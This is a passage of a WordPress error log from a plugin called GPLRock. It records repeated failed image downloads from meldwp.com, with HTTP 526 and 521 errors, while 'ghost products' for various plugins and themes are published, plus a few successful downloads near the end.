https://meldwp.com/wp-content/uploads/preview-submission-in-gravity-forms-26658.webp for product preview-submission-in-gravity-forms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:17 UTC] GPLRock: Image download failed for product preview-submission-in-gravity-forms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:19 UTC] GPLRock: Image download failed for product preview-submission-in-gravity-forms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/preview-submission-in-gravity-forms-26658.webp for product preview-submission-in-gravity-forms after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:21 UTC] GPLRock WARNING: Image download failed for product preview-submission-in-gravity-forms. URL: https://meldwp.com/wp-content/uploads/preview-submission-in-gravity-forms-26658.webp [04-Apr-2026 21:59:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: preview-submission-in-gravity-forms [04-Apr-2026 21:59:21 UTC] GPLRock: Image download failed for product magic-seo-automatic-wordpress-seo (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:23 UTC] GPLRock: Image download failed for product magic-seo-automatic-wordpress-seo (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magic-seo---automatic-wordpress-seo-23831.webp for product magic-seo-automatic-wordpress-seo after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:26 UTC] GPLRock: Image download failed for product magic-seo-automatic-wordpress-seo (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:28 UTC] GPLRock: Image download failed for product magic-seo-automatic-wordpress-seo (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/magic-seo---automatic-wordpress-seo-23831.webp for product magic-seo-automatic-wordpress-seo after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:30 UTC] GPLRock WARNING: Image download failed for product magic-seo-automatic-wordpress-seo. URL: https://meldwp.com/wp-content/uploads/magic-seo---automatic-wordpress-seo-23831.webp [04-Apr-2026 21:59:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: magic-seo-automatic-wordpress-seo [04-Apr-2026 21:59:30 UTC] GPLRock: Image download failed for product bar-and-pie-charts-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:32 UTC] GPLRock: Image download failed for product bar-and-pie-charts-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bar-and-pie-charts-for-elementor-wordpress-plugin-28669.webp for product bar-and-pie-charts-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:34 UTC] GPLRock: Image download failed for product bar-and-pie-charts-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:36 UTC] GPLRock: Image download failed for product bar-and-pie-charts-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bar-and-pie-charts-for-elementor-wordpress-plugin-28669.webp for product bar-and-pie-charts-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:38 UTC] GPLRock WARNING: Image download failed for product bar-and-pie-charts-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/bar-and-pie-charts-for-elementor-wordpress-plugin-28669.webp [04-Apr-2026 21:59:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bar-and-pie-charts-for-elementor-wordpress-plugin [04-Apr-2026 21:59:39 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-ninja-popups (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:41 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-ninja-popups (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress---ninja-popups-23565.webp for product popup-plugin-for-wordpress-ninja-popups after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:43 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-ninja-popups (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:45 UTC] GPLRock: Image download failed for product popup-plugin-for-wordpress-ninja-popups (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress---ninja-popups-23565.webp for product popup-plugin-for-wordpress-ninja-popups after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:47 UTC] GPLRock WARNING: Image download failed for product popup-plugin-for-wordpress-ninja-popups. URL: https://meldwp.com/wp-content/uploads/popup-plugin-for-wordpress---ninja-popups-23565.webp [04-Apr-2026 21:59:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: popup-plugin-for-wordpress-ninja-popups [04-Apr-2026 21:59:47 UTC] GPLRock: Image download failed for product woocommerce-tier-based-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:50 UTC] GPLRock: Image download failed for product woocommerce-tier-based-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-tier-based-pricing-3362.webp for product woocommerce-tier-based-pricing after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:52 UTC] GPLRock: Image download failed for product woocommerce-tier-based-pricing (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:54 UTC] GPLRock: Image download failed for product woocommerce-tier-based-pricing (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-tier-based-pricing-3362.webp for product woocommerce-tier-based-pricing after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 21:59:56 UTC] GPLRock WARNING: Image download failed for product woocommerce-tier-based-pricing. URL: https://meldwp.com/wp-content/uploads/woocommerce-tier-based-pricing-3362.webp [04-Apr-2026 21:59:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-tier-based-pricing [04-Apr-2026 21:59:56 UTC] GPLRock: Image download failed for product flexbox-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 21:59:58 UTC] GPLRock: Image download failed for product flexbox-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexbox-tables-26706.webp for product flexbox-tables after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:01 UTC] GPLRock: Image download failed for product flexbox-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:03 UTC] GPLRock: Image download failed for product flexbox-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flexbox-tables-26706.webp for product flexbox-tables after 3 attempts. HTTP Code: 521, Error: [04-Apr-2026 22:00:05 UTC] GPLRock WARNING: Image download failed for product flexbox-tables. URL: https://meldwp.com/wp-content/uploads/flexbox-tables-26706.webp [04-Apr-2026 22:00:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flexbox-tables [04-Apr-2026 22:00:05 UTC] GPLRock: Image download failed for product bs-gmaps-pro-google-map-widget-for-elementor (attempt 1/3). HTTP Code: 521, Error: . Retrying... [04-Apr-2026 22:00:07 UTC] GPLRock: Image download failed for product bs-gmaps-pro-google-map-widget-for-elementor (attempt 2/3). HTTP Code: 521, Error: . Retrying... [04-Apr-2026 22:00:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bs-gmaps-pro--google-map-widget-for-elementor-18861.webp for product bs-gmaps-pro-google-map-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:09 UTC] GPLRock: Image download failed for product bs-gmaps-pro-google-map-widget-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:11 UTC] GPLRock: Image download failed for product bs-gmaps-pro-google-map-widget-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bs-gmaps-pro--google-map-widget-for-elementor-18861.webp for product bs-gmaps-pro-google-map-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:13 UTC] GPLRock WARNING: Image download failed for product bs-gmaps-pro-google-map-widget-for-elementor. URL: https://meldwp.com/wp-content/uploads/bs-gmaps-pro--google-map-widget-for-elementor-18861.webp [04-Apr-2026 22:00:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bs-gmaps-pro-google-map-widget-for-elementor [04-Apr-2026 22:00:14 UTC] GPLRock: Image download failed for product woocommerce-buy-again-repeat-orders-on-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:16 UTC] GPLRock: Image download failed for product woocommerce-buy-again-repeat-orders-on-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-buy-again--repeat-orders-on-woocommerce-33531.webp for product woocommerce-buy-again-repeat-orders-on-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:18 UTC] GPLRock: Image download failed for product woocommerce-buy-again-repeat-orders-on-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:20 UTC] GPLRock: Image download failed for product woocommerce-buy-again-repeat-orders-on-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-buy-again--repeat-orders-on-woocommerce-33531.webp for product woocommerce-buy-again-repeat-orders-on-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:22 UTC] GPLRock WARNING: Image download failed for product woocommerce-buy-again-repeat-orders-on-woocommerce. URL: https://meldwp.com/wp-content/uploads/woocommerce-buy-again--repeat-orders-on-woocommerce-33531.webp [04-Apr-2026 22:00:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-buy-again-repeat-orders-on-woocommerce [04-Apr-2026 22:00:46 UTC] GPLRock: Image downloaded successfully for product coinpress-cryptocurrency-pages-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7d79337.webp [04-Apr-2026 22:00:46 UTC] GPLRock: Using pre-downloaded image for product coinpress-cryptocurrency-pages-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b7d79337.webp [04-Apr-2026 22:00:46 UTC] GPLRock: Ghost product published with image - Product ID: coinpress-cryptocurrency-pages-for-wordpress [04-Apr-2026 22:00:46 UTC] GPLRock: Image download failed for product vakka-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:48 UTC] GPLRock: Image download failed for product vakka-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vakka---addons-for-elementor-14350.webp for product vakka-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:50 UTC] GPLRock: Image download failed for product vakka-addons-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:52 UTC] GPLRock: Image download failed for product vakka-addons-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/vakka---addons-for-elementor-14350.webp for product vakka-addons-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:54 UTC] GPLRock WARNING: Image download failed for product vakka-addons-for-elementor. URL: https://meldwp.com/wp-content/uploads/vakka---addons-for-elementor-14350.webp [04-Apr-2026 22:00:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: vakka-addons-for-elementor [04-Apr-2026 22:00:54 UTC] GPLRock: Image download failed for product minimal-posts-revolution-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:57 UTC] GPLRock: Image download failed for product minimal-posts-revolution-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:00:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimal-posts-revolution-for-elementor-wordpress-plugin-8180.webp for product minimal-posts-revolution-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:00:59 UTC] GPLRock: Image download failed for product minimal-posts-revolution-for-elementor-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:01 UTC] GPLRock: Image download failed for product minimal-posts-revolution-for-elementor-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/minimal-posts-revolution-for-elementor-wordpress-plugin-8180.webp for product minimal-posts-revolution-for-elementor-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:03 UTC] GPLRock WARNING: Image download failed for product minimal-posts-revolution-for-elementor-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/minimal-posts-revolution-for-elementor-wordpress-plugin-8180.webp [04-Apr-2026 22:01:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: minimal-posts-revolution-for-elementor-wordpress-plugin [04-Apr-2026 22:01:03 UTC] GPLRock: Image download failed for product woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:05 UTC] GPLRock: Image download failed for product woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-chained-products-pro---one-get-one-deals-hard-sells-product-suites-9122.webp for product woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:07 UTC] GPLRock: Image download failed for product woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:09 UTC] GPLRock: Image download failed for product woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-chained-products-pro---one-get-one-deals-hard-sells-product-suites-9122.webp for product woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:12 UTC] GPLRock WARNING: Image download failed for product woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites. URL: https://meldwp.com/wp-content/uploads/woocommerce-chained-products-pro---one-get-one-deals-hard-sells-product-suites-9122.webp [04-Apr-2026 22:01:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-chained-products-pro-one-get-one-deals-hard-sells-product-suites [04-Apr-2026 22:01:12 UTC] GPLRock: Image download failed for product product-variation-table-of-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:14 UTC] GPLRock: Image download failed for product product-variation-table-of-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-variation-table-of-woocommerce-17472.webp for product product-variation-table-of-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:16 UTC] GPLRock: Image download failed for product product-variation-table-of-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:18 UTC] GPLRock: Image download failed for product product-variation-table-of-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/product-variation-table-of-woocommerce-17472.webp for product product-variation-table-of-woocommerce after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:20 UTC] GPLRock WARNING: Image download failed for product product-variation-table-of-woocommerce. URL: https://meldwp.com/wp-content/uploads/product-variation-table-of-woocommerce-17472.webp [04-Apr-2026 22:01:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: product-variation-table-of-woocommerce [04-Apr-2026 22:01:20 UTC] GPLRock: Image download failed for product nearby-places-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:22 UTC] GPLRock: Image download failed for product nearby-places-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nearby-places-wordpress-plugin-13287.webp for product nearby-places-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:25 UTC] GPLRock: Image download failed for product nearby-places-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:27 UTC] GPLRock: Image download failed for product nearby-places-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nearby-places-wordpress-plugin-13287.webp for product nearby-places-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:29 UTC] GPLRock WARNING: Image download failed for product nearby-places-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/nearby-places-wordpress-plugin-13287.webp [04-Apr-2026 22:01:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nearby-places-wordpress-plugin [04-Apr-2026 22:01:29 UTC] GPLRock: Image download failed for product supreme-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:31 UTC] GPLRock: Image download failed for product supreme-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supreme-tables-5546.webp for product supreme-tables after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:33 UTC] GPLRock: Image download failed for product supreme-tables (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:35 UTC] GPLRock: Image download failed for product supreme-tables (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/supreme-tables-5546.webp for product supreme-tables after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:37 UTC] GPLRock WARNING: Image download failed for product supreme-tables. URL: https://meldwp.com/wp-content/uploads/supreme-tables-5546.webp [04-Apr-2026 22:01:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: supreme-tables [04-Apr-2026 22:01:38 UTC] GPLRock: Image download failed for product x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:40 UTC] GPLRock: Image download failed for product x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for--6378.webp for product x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:42 UTC] GPLRock: Image download failed for product x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:44 UTC] GPLRock: Image download failed for product x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for--6378.webp for product x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:46 UTC] GPLRock WARNING: Image download failed for product x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for--6378.webp [04-Apr-2026 22:01:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: x-omatic-automatic-post-generator-and-x-formerly-twitter-auto-poster-plugin-for-wordpress [04-Apr-2026 22:01:46 UTC] GPLRock: Image download failed for product infinite-blog-magazine-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:48 UTC] GPLRock: Image download failed for product infinite-blog-magazine-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infinite---blog--magazine-script-30371.webp for product infinite-blog-magazine-script after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:51 UTC] GPLRock: Image download failed for product infinite-blog-magazine-script (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:53 UTC] GPLRock: Image download failed for product infinite-blog-magazine-script (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infinite---blog--magazine-script-30371.webp for product infinite-blog-magazine-script after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:55 UTC] GPLRock WARNING: Image download failed for product infinite-blog-magazine-script. URL: https://meldwp.com/wp-content/uploads/infinite---blog--magazine-script-30371.webp [04-Apr-2026 22:01:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infinite-blog-magazine-script [04-Apr-2026 22:01:55 UTC] GPLRock: Image download failed for product report-builder-generate-word-docx-and-excel-xlsx-documents (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:57 UTC] GPLRock: Image download failed for product report-builder-generate-word-docx-and-excel-xlsx-documents (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:01:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/report-builder---generate-word-docx-and-excel-xlsx-documents-30993.webp for product report-builder-generate-word-docx-and-excel-xlsx-documents after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:01:59 UTC] GPLRock: Image download failed for product report-builder-generate-word-docx-and-excel-xlsx-documents (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:02:01 UTC] GPLRock: Image download failed for product report-builder-generate-word-docx-and-excel-xlsx-documents (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:02:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/report-builder---generate-word-docx-and-excel-xlsx-documents-30993.webp for product report-builder-generate-word-docx-and-excel-xlsx-documents after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:02:03 UTC] GPLRock WARNING: Image download failed for product report-builder-generate-word-docx-and-excel-xlsx-documents. URL: https://meldwp.com/wp-content/uploads/report-builder---generate-word-docx-and-excel-xlsx-documents-30993.webp [04-Apr-2026 22:02:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: report-builder-generate-word-docx-and-excel-xlsx-documents [04-Apr-2026 22:02:46 UTC] GPLRock: Image downloaded successfully for product brooklyn-creative-multipurpose-responsive-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9dcb06d8.jpg [04-Apr-2026 22:02:46 UTC] GPLRock: Using pre-downloaded image for product brooklyn-creative-multipurpose-responsive-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9dcb06d8.jpg [04-Apr-2026 22:02:46 UTC] GPLRock: Ghost product published with image - Product ID: brooklyn-creative-multipurpose-responsive-wordpress-theme [04-Apr-2026 22:02:48 UTC] GPLRock: Image downloaded successfully for product woocommerce-admin-custom-order-fields (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad5b5f68.jpg [04-Apr-2026 22:02:48 UTC] GPLRock: Using pre-downloaded image for product woocommerce-admin-custom-order-fields: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ad5b5f68.jpg [04-Apr-2026 22:02:48 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-admin-custom-order-fields [04-Apr-2026 22:02:49 UTC] GPLRock: Image downloaded successfully for product responsive-supermarket-online-theme-oswad (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37dc4bec.jpg [04-Apr-2026 22:02:50 UTC] GPLRock: Using pre-downloaded image for product responsive-supermarket-online-theme-oswad: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-37dc4bec.jpg [04-Apr-2026 22:02:50 UTC] GPLRock: Ghost product published with image - Product ID: responsive-supermarket-online-theme-oswad [04-Apr-2026 22:02:51 UTC] GPLRock: Image downloaded successfully for product css-igniter-sun-resort-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6a07100.jpg [04-Apr-2026 22:02:51 UTC] GPLRock: Using pre-downloaded image for product css-igniter-sun-resort-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b6a07100.jpg [04-Apr-2026 22:02:51 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-sun-resort-wordpress-theme [04-Apr-2026 22:02:53 UTC] GPLRock: Image downloaded successfully for product reales-wp-real-estate-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-18432aeb.jpg [04-Apr-2026 22:02:53 UTC] GPLRock: Using pre-downloaded image for product reales-wp-real-estate-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-18432aeb.jpg [04-Apr-2026 22:02:53 UTC] GPLRock: Ghost product published with image - Product ID: reales-wp-real-estate-wordpress-theme [04-Apr-2026 22:02:55 UTC] GPLRock: Image downloaded successfully for product free-gifts-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c3fa657.jpg [04-Apr-2026 22:02:55 UTC] GPLRock: Using pre-downloaded image for product free-gifts-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c3fa657.jpg [04-Apr-2026 22:02:55 UTC] GPLRock: Ghost product published with image - Product ID: free-gifts-for-woocommerce [04-Apr-2026 22:02:56 UTC] GPLRock: Image downloaded successfully for product mythemeshop-newsmag-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5c282f5.jpg [04-Apr-2026 22:02:56 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-newsmag-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c5c282f5.jpg [04-Apr-2026 22:02:56 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-newsmag-wordpress-theme [04-Apr-2026 22:02:58 UTC] GPLRock: Image downloaded successfully for product woocommerce-estimated-shipping-date-per-product (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8912c0f6.jpg [04-Apr-2026 22:02:58 UTC] GPLRock: Using pre-downloaded image for product woocommerce-estimated-shipping-date-per-product: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8912c0f6.jpg [04-Apr-2026 22:02:58 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-estimated-shipping-date-per-product [04-Apr-2026 22:02:59 UTC] GPLRock: Image downloaded successfully for product wp-job-manager-resume-manager-addon (attempt 1) to: 